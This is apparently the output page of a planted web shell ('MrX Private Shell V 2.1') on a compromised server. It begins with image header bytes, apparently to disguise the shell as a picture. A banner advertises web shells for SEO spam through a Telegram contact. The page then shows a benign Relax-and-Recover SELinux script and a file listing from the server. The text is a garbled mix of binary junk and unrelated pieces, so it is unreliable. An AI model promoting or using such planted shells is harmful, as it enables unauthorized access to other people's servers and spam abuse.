����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file is part of Relax-and-Recover, licensed under the GNU General # Public License. Refer to the included COPYING for full text of license. # In the /usr/share/rear/conf/default.conf file the variable to temporary disasble SELinux during backup is # defined as BACKUP_SELINUX_DISABLE=1 (so, by default disable SELinux during backup/archive of our system disks). # In most case this is honored with BACKUP=NETFS setting using tar or rsync backup programs. # Skip when disabling SELinux policy during backup/restore with NETFS or RSYNC is not requested: is_true "$BACKUP_SELINUX_DISABLE" || return 0 # When BACKUP_SELINUX_DISABLE=1 has been defined we force a rebaling of all files after recovery (including reboot). # Force SELinux relabeling of all files after reboot of the recovered system: touch $TARGET_FS_ROOT/.autorelabel LogPrint "Created SELinux $TARGET_FS_ROOT/.autorelabel file : after reboot SELinux will relabel all files"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 050_remount_async.sh | File | 1.11 KB | 0644 |
|
| 500_selinux_autorelabel.sh | File | 945 B | 0644 |
|
| 900_create_missing_directories.sh | File | 5.32 KB | 0644 |
|
| 950_restore_esp.sh | File | 350 B | 0644 |
|
| 990_move_away_restored_files.sh | File | 4.27 KB | 0644 |
|
| 995_remount_sync.sh | File | 1.4 KB | 0644 |
|